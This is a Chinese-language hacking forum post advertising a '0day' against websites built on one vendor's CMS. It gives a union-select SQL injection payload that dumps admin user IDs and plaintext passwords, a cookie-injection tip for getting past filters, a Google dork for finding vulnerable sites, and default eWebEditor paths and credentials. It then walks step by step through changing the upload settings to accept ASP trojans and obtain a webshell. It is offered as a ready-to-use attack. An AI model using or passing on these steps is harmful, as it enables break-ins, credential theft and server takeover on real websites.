传信网络开发网站的0day

网络上曾传言此网站 超牛.防注入 上传很难突破.后台system/login.asp也是 进了ewebeditor也是防密码的 好多大牛都很难搞的下 但是试了一下这套源码并不像其所说的那么厉害， 其实这个系统是可以sql注入的，并且是明文。只不过字段不太统一，14-20左右。自己测试。 order by xx 后台：system/login.asp Exp: and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master 如果有防注入，cookie注入可以突破。 不多说了，下面是0day Google 搜索inurl:product1.asp?tyc= 编辑器漏洞默认后台ubbcode/admin_login.asp 数据库ubbcode/db/ewebeditor.mdb 默认账号密码yzm 111111 拿webshell方法 登陆后台点击“样式管理”-选择新增样式 只写这几样 大家照做就行了 样式名称:scriptkiddies 随便写 路径模式：选择绝对路径 图片类型：gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx 图片类型比如就是我们要上传的ASP木马格式 上传路径：/ 图片限制：写上1000 免的上不了我们的asp木马 上传内容不要写 然后我们就可以提交了 就可以看到样式增加成功！ 然后我们按-返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 然后按-按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置 然后网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies 上传 ASP木马 回车 就可以等到路径